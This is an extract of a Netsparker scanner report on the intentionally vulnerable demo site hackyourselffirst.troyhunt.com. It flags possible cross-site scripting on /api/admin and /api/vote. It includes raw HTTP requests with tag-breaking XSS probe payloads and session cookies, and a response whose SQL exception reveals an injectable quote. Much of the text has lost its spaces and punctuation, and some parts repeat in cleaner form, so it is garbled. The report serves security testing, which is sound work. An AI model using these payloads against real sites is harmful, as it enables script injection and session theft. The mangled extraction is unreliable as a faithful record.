RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters
Parameter  Type  Value
nsextt     GET   '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues; you need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto MIME sniffing, such as Internet Explorer.
Certainty
Request
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
28 57